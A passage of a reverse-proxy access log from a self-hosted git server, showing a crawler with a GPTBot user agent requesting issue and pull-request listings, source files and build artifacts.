compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" -[17/Feb/2026:18:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:18:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11435] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11434] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:18:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:18:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:18:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11217] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 11113] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=open&type=all" -[17/Feb/2026:18:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=latest&state=open&type=all" -[17/Feb/2026:18:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13361] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:18:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10142] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:54:20 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:54:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:54:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:54:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 4617598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 9815] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:18:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:18:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:18:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] 